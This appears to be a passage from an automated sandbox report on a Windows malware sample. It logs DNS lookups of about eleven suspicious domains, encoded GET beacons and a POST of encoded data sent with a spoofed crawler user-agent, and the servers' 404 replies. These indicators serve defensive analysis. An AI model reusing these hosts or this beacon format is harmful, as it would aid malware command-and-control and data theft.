Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00A822EE

Source: global traffic	HTTP traffic detected: GET /ou8k/?wtE0B=1LjxZz&9F=sHhXhPPev91RFxpiABH++MCfuMPpFFZ8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQcFcEZTyl6CSjd+TmO0sI7dzm7yirMvYOFPgxKsvpHXbsFCpq0n5Sy3gZxoaEsqIw5Xzm0kuoI HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.aoivej.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.givvjn.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /xbnt/?9F=rqIPJyQOuOJXv4fbpZifam4NGQmFDlkIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlHSFHpTMESY5PIg2QQDYfpCfgaUZe3U6n0Vyz+dFy5VePm5+jk7AWmLgw&wtE0B=1LjxZz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.gern.devConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.newbh.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /b0aw/?wtE0B=1LjxZz&9F=VOu4tm+43rVZiGe4K7AcFv6we6IMDB3Zsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLPrvuPSkYs6IWzvZ1It1WQJjP5+KmCtojeJnesOx46iHJS4Dx3Mp7sKKT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.thinkone.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /ixqi/?9F=TN9kbi/KmEXimVSK7kRkm1cjJuW4yHg+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyfl2Biaruko68KDljX6JEffS78HWaQA9pI6q30E6ldWWZvXFcrza4Lp7u&wtE0B=1LjxZz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.mraber.devConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.einpisalpace.shopConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /okq9/?wtE0B=1LjxZz&9F=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.fzmmkj.shopConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Source: global traffic	HTTP traffic detected: GET /798t/?9F=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&wtE0B=1LjxZz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USHost: www.l03678.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)

Source: global traffic	DNS traffic detected: DNS query: www.aoivej.info
Source: global traffic	DNS traffic detected: DNS query: www.givvjn.info
Source: global traffic	DNS traffic detected: DNS query: www.gern.dev
Source: global traffic	DNS traffic detected: DNS query: www.newbh.pro
Source: global traffic	DNS traffic detected: DNS query: www.thinkone.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mraber.dev
Source: global traffic	DNS traffic detected: DNS query: www.einpisalpace.shop
Source: global traffic	DNS traffic detected: DNS query: www.multichaindapps.pro
Source: global traffic	DNS traffic detected: DNS query: www.fzmmkj.shop
Source: global traffic	DNS traffic detected: DNS query: www.l03678.xyz
Source: global traffic	DNS traffic detected: DNS query: www.aihuzhibo.net

Source: unknown

HTTP traffic detected: POST /wl3x/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.givvjn.infoOrigin: http://www.givvjn.infoReferer: http://www.givvjn.info/wl3x/Content-Length: 215Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)Data Raw: 39 46 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 6f 66 39 4c 69 42 69 6d 6f 47 78 51 35 76 54 6b 46 74 51 5a 50 53 51 6e 67 74 74 4d 65 51 68 72 4d 4d 66 6c 50 58 67 79 6d 50 69 52 44 6c 52 70 47 75 35 68 52 2b 48 41 38 64 76 71 33 55 32 54 5a 6f 45 76 75 32 61 4b 2b 72 31 50 79 34 55 4e 7a 64 41 70 4b 71 6d 76 4a 73 41 55 4d 76 42 6f 61 70 34 77 75 72 59 58 4b 53 7a 69 74 59 79 73 48 73 4c 45 77 52 36 41 64 51 73 6b 50 31 4c 65 6f 50 67 67 34 47 31 77 49 64 69 47 63 6a 7a 4f 36 49 78 6e 4e 64 6e 75 47 77 30 4a 2f 47 65 6a 35 59 69 66 48 6a 73 42 47 48 67 36 77 41 6f 31 52 6c 54 57 2f 37 49 54 64 43 6d 51 58 49 67 6e 5a 75 36 4e 73 41 3d 3d Data Ascii: 9F=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK+r1Py4UNzdApKqmvJsAUMvBoap4wurYXKSzitYysHsLEwR6AdQskP1LeoPgg4G1wIdiGcjzO6IxnNdnuGw0J/Gej5YifHjsBGHg6wAo1RlTW/7ITdCmQXIgnZu6NsA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:55:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:55:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:55:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:55:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:53:30 GMTServer: Apache/2.4.10 (Debian)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 72 61 62 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.mraber.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:56:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R0xc5nd1zjFpTNNLzntowBkrGHLZ37WWF44QHn%2BsXVpkKZcqHUte534XUpvk6RjoAhSy3DkkPwxi0CQA4LdpLk9Yxt9bx%2FSzaeuYe4h%2FcHd0s0Io9mRvXv17PEzr1dRLqoMHw0NrKmc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000f230bd69c407-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1580&rtt_var=790&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=701&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 09 d4 dc Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:56:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BPkj%2FnhsdJ130VuUrtmd02HCaumrdINsUkoaVAfl2QzBwAZx6i8hd3zMOUGnxHLlOjge1HTB5vbWg8FlstPNu24cDbZ8uqsy00YhXK7qX%2BjTiWxK2a%2Fm%2BVi5U16h04vk9QY7IKYP7U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000f240fb875e73-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=721&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 Data Ascii: 2daTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:56:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8OMLhX9Ru9PUq0yPEcuntxiZq5Fj12PrbtZvQ0%2BHUsjg3l748YFtNP13i77NrPLOz3cy660zBMrfvMeAxLt3krWxbj0A7ok3Zkav751M%2Be67bJSQTG0A4cfObnu%2Bq2BkVGY3Tzrllc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000f251b8f40f84-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=800&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1734&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 d7 09 d4 Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
